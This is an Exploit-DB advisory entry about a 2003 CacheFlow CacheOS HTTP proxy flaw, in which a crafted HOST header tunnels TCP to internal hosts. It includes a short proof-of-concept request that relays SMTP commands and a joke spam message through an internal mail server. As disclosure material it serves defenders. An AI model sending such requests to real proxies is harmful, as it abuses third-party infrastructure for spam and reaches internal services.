CacheFlow CacheOS 4.1.10016 HTTP HOST Proxy Vulnerability

2003-09-10T00:00:00
ID EDB-ID:23137
Type exploitdb
Reporter Tim Kennedy
Modified 2003-09-10T00:00:00

Description

CacheFlow CacheOS 4.1.10016 HTTP HOST Proxy Vulnerability. Remote exploits for multiple platform

                                        
                                            source: http://www.securityfocus.com/bid/8584/info

Malicious HTTP HOST header field can be used on CacheOS to tunnel arbitrary TCP connections through a HTTP request.

It has been reported that CacheFlow CacheOS may allow the misuse of the HOST header value. This may provide for the use of an internal mail server as an open relay for the purposes of sending unsolicited mass email.

GET / HTTP/1.1
HOST: mailserver.example.com:25
HELO .
mail from: spammer@example.com
rcpt to: target@example.com
DATA
Subject: Look Ma! I'm an open relay
HI, you've been spammed through an open proxy, because of a bug in the
OS code. Have a Great Day!
-Spammer